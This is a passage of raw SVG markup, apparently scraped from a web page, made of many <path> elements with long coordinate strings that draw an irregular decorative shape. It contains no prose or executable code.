d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.